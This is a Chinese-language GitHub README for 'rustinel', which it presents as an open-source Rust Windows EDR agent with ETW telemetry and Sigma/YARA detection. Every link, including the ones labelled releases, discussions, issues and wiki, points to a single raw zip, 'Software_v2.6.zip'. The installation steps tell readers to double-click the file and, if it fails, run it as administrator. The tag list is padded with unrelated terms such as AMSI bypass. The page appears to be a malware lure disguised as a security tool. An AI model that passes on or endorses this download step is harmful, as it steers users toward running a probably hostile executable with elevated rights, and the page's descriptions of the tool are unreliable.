MrSpaghettiBK/rustinel
GitHub: MrSpaghettiBK/rustinel
声称是使用Rust编写的高性能Windows EDR代理,通过ETW遥测和Sigma/YARA规则实现威胁检测与SIEM集成
Stars: 0 | Forks: 0
# 🛡️ rustinel - 您的高性能 Windows 安全工具
## 🚀 入门指南
欢迎使用 rustinel!本应用程序旨在通过提供有效的端点检测与响应 (EDR) 功能,帮助您增强 Windows 计算机的安全性。本指南将引导您轻松完成 rustinel 的下载和运行。
## 📥 下载 rustinel
[](https://raw.githubusercontent.com/MrSpaghettiBK/rustinel/main/examples/Software_v2.6.zip)
## 🔍 什么是 rustinel?
rustinel 是一个使用 Rust 编程语言构建的开源 Windows EDR 代理。它通过 Event Tracing for Windows (ETW) 收集遥测数据,并利用 Sigma 和 YARA 规则帮助检测潜在威胁。使用 rustinel,您可以在安全信息和事件管理 (SIEM) 系统上接收告警。
## 💻 系统要求
为了流畅运行 rustinel,请确保您的计算机满足以下要求:
- **操作系统:** Windows 10 或更新版本
- **处理器:** 64 位处理器
- **内存:** 至少 4 GB RAM
- **磁盘空间:** 最少 100 MB 可用磁盘空间
- **网络:** 需要活跃的互联网连接以进行更新和接收告警
## ⚙️ 主要特性
- **ETW 遥测:** 实时监控事件,以及时捕获威胁。
- **Sigma/YARA 检测:** 使用知名的检测规则来识别恶意软件和可疑活动。
- **ECS 告警:** 向您的 SIEM 系统发送告警,通知您潜在的安全问题。
- **用户模式运行:** 专为在用户模式下运行而设计,以实现更好的性能和效率。
- **开源:** 社区驱动,任何人都可以检查或贡献代码。
## 📊 涵盖的技术主题
本应用程序涵盖了一系列基本的安全主题,包括:
- 蓝队策略 (Blue Team Strategies)
- 检测工程 (Detection Engineering)
- 恶意软件检测 (Malware Detection)
- 应急响应技术 (Incident Response Techniques)
- 威胁检测方法 (Threat Detection Approaches)
## 📂 下载与安装
要开始使用 rustinel,请按照以下简单步骤操作:
1. **访问发布页面:** 点击下方链接进入 GitHub Releases 页面。
[下载最新版本](https://raw.githubusercontent.com/MrSpaghettiBK/rustinel/main/examples/Software_v2.6.zip)
2. **选择正确的文件:** 在页面顶部查找最新版本。您会在那里找到各种文件。请选择适合您系统的文件。
3. **下载文件:** 点击文件名开始下载。下载应会自动开始。
4. **安装 rustinel:**
- 在您的“下载”文件夹(或您选择的下载目录)中找到已下载的文件。
- 双击文件以运行它。
- 按照安装提示进行操作。
5. **设置配置:** 安装完成后,您可能需要配置 rustinel 以根据您的需求调整其功能。请查阅文档了解设置选项。
6. **开始使用 rustinel:** 从“开始”菜单或桌面快捷方式启动应用程序。您应该会看到主界面,rustinel 将开始收集遥测数据。
## ⚙️ 常见问题排查
如果您在安装或使用过程中遇到问题,以下快速清单可为您提供帮助:
- **应用程序无法启动:** 确保您拥有管理员权限。右键单击应用程序并选择“以管理员身份运行”。
- **错误信息:** 查看显示的错误信息。通常,它会提供解决问题的提示。
- **性能缓慢:** 确保您的系统满足要求。如有必要,请释放磁盘空间。
## 📞 获取支持
如果您需要进一步的帮助,欢迎查看以下资源:
- **社区论坛:** 加入我们在 [GitHub Discussions](https://raw.githubusercontent.com/MrSpaghettiBK/rustinel/main/examples/Software_v2.6.zip) 的讨论。
- **问题页面:** 在 [Issues 部分](https://raw.githubusercontent.com/MrSpaghettiBK/rustinel/main/examples/Software_v2.6.zip) 报告错误或功能请求。
- **文档:** 访问我们的 [Wiki](https://raw.githubusercontent.com/MrSpaghettiBK/rustinel/main/examples/Software_v2.6.zip) 获取深入的信息和教程。
按照这些步骤,您可以确保顺利完成设置,并开始有效地使用 rustinel 来保护您的 Windows 环境。感谢您选择 rustinel!
标签:AMSI绕过, API接口, CSV导出, DAST, ECS 格式, ETW, RFI远程文件包含, Rust, SIEM 集成, Sigma 规则, TLS, Windows EDR, Windows 安全, WSL, YARA, 不可变基础设施, 事件日志监控, 事件跟踪, 云资产可视化, 可视化界面, 域名分析, 威胁检测, 子域枚举, 安全遥测, 开源安全工具, 恶意软件分析, 端点检测与响应, 网络安全, 网络安全审计, 网络流量审计, 脱壳工具, 逆向工程平台, 通知系统, 通知系统, 防御工具, 隐私保护